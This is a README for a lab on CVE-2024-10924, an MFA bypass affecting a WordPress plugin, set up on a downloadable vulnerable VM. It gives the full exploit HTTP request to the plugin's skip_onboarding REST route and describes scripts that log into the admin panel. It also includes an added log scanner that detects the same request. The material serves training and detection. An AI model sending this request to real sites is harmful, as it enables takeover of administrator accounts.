## https://sploitus.com/exploit?id=ACA80540-F613-50DD-97D7-1F90E815741E
# CVE-2024-10924 Bypass MFA WordPress - Exploit Lab
This repository provides a lab for exploiting the `CVE-2024-10924` vulnerability in `WordPress`, specifically to bypass `two-factor authentication (MFA)` and gain access to the `WordPress` administration panel.
## Prerequisites
To deploy this lab in your environment, follow the steps below:
## **Deploy WordPress on VMware**
Unzip the LAB `zip` file. In VMware, click `Open` to import a machine and select the file called `Ubuntu-Bypass-MFA-Wordpress.vmx`. Finally, click `Power` to turn on the vulnerable machine.
[Download LAB](https://drive.google.com/file/d/1a8h6HHDFfkyZRGUdvXdQtcYxLiXH8n_I/view?usp=sharing)
## **Configure Kali Linux**
On your Kali machine, make sure the following tool and Python packages are installed:
- `nmap`: To perform network scans.
- `requests`: To make HTTP requests (if you don't have it, install `requests` with `pip install requests`).
- `rich`: For elegant output to the console (install with `pip install rich`).
## **Get WordPress machine IP**
To get the IP of the WordPress machine in the network environment, run the following script from your Kali machine:
```bash
$ python3 knowIPwordpress.py
```
This script does the following:
- Detects your local `IP`.
- Scans the corresponding network segment to find active `IPs`.
- Performs a port scan for `HTTP` services.
- Checks that the WordPress machine's `IP` has the title `"Bypass-MFA"` in its `HTTP` service.
Once found, it will show you the `URL` where you can access the `WordPress` administration panel:
```bash
Accede a WordPress en: http://<IP>/wp-admin
```
## Two-Factor Verification (MFA) Bypass:
### WordPress credentials:
```
admin:admin
```
When you try to log in to `WordPress`, it will ask you for `two-factor verification (MFA)`. To bypass this step, run the following script on your `Kali`:
```bash
$ python3 bypass-MFA-Wordpress.py
```
## How the `bypass-MFA-Wordpress.py` script works
This script exploits the `CVE-2024-10924` vulnerability and bypasses two-factor verification to gain access to the `WordPress` administration panel.
## Script flow:
Get session cookie: The script makes an `HTTP` request to the `reallysimplessl/v1/two_fa/skip_onboarding` endpoint to obtain a valid session cookie.
The request is sent with the following information:
```json
{
"user_id": 1,
"login_nonce": "133333337",
"redirect_to": "/wp-admin/"
}
```
## Login Request:
Once the cookie is obtained, the script asks for the `WordPress` username and password. It then makes a `POST` request to the `wp-admin/profile.php` endpoint with the provided credentials to log in.
## Generation of an HTML file:
If the bypass is successful, the script saves the response from the administrator dashboard to a `.html` file and opens it in your default browser.
You will now have access to the `WordPress` administration panel!
## Manual Bypass-MFA-Wordpress:
If you want to do it manually with `BurpSuite`, you first need to know the `Endpoint` to which the request must be sent in order to capture the `Cookies`. You can find it as follows:
```bash
$ python3 endpointWordpress.py
```
This prints the request that you will have to put in `BurpSuite` to capture the `Cookies`. In my case it looks like this:
```http
POST http://192.168.5.192/?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: 192.168.5.192
Content-Type: application/json
Content-Length: 89
Connection: keep-alive

{
"user_id": 1,
"login_nonce": "133333337",
"redirect_to": "/wp-admin/"
}
```
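For the defending side of the lab, the request shown above leaves a recognisable entry in the web server access log. The following is an added example, not part of this repository: a small log scanner that flags `POST` requests to the `skip_onboarding` route. It assumes Combined Log Format and also matches the route when it is reached through WordPress's `/wp-json/` form of the REST API; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Route taken from the request shown on this page.
ROUTE = "/reallysimplessl/v1/two_fa/skip_onboarding"

# Assumed Combined Log Format: ip - user [time] "METHOD target PROTO" status ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

def rest_route(target):
    """Return the REST route a request target addresses, or None."""
    parts = urlsplit(target)
    # Form 1: ?rest_route=/namespace/route (parse_qs percent-decodes the value)
    values = parse_qs(parts.query).get("rest_route")
    if values:
        route = values[0]
    else:
        # Form 2: pretty permalinks, /wp-json/namespace/route
        path = unquote(parts.path)
        if "/wp-json/" not in path:
            return None
        route = "/" + path.split("/wp-json/", 1)[1]
    # Normalise case, duplicate and trailing slashes before comparing
    return re.sub(r"/+", "/", route).rstrip("/").lower()

def find_hits(lines):
    """Return (ip, time, status) for each POST to the skip_onboarding route."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if m and m["method"] == "POST" and rest_route(m["target"]) == ROUTE:
            hits.append((m["ip"], m["time"], int(m["status"])))
    return hits

# Constructed sample log lines (not captured from the lab)
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2025:10:00:00 +0000] "POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2025:10:00:05 +0000] "POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding/ HTTP/1.1" 403 98',
    '192.0.2.12 - - [01/Jan/2025:10:00:09 +0000] "POST /?rest_route=%2Freallysimplessl%2Fv1%2Ftwo_fa%2Fskip_onboarding HTTP/1.1" 200 512',
    '192.0.2.13 - - [01/Jan/2025:10:00:12 +0000] "GET /wp-json/wp/v2/posts HTTP/1.1" 200 2048',
    '192.0.2.14 - - [01/Jan/2025:10:00:15 +0000] "POST /wp-login.php HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, when, status in find_hits(SAMPLE):
        print(f"{when} {ip} POST {ROUTE} -> HTTP {status}")
```

Access logs do not record the `POST` body, so the match is made on method and route only; the status code in each hit shows how the server answered.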
### Performing manual technique in video format:
https://github.com/user-attachments/assets/e70789d1-4fe4-46b4-81ef-76229dd265ce
## More information in my YT video:
LINK = [Video CVE-2024-10924-Bypass-MFA-Wordpress-LAB](LINK)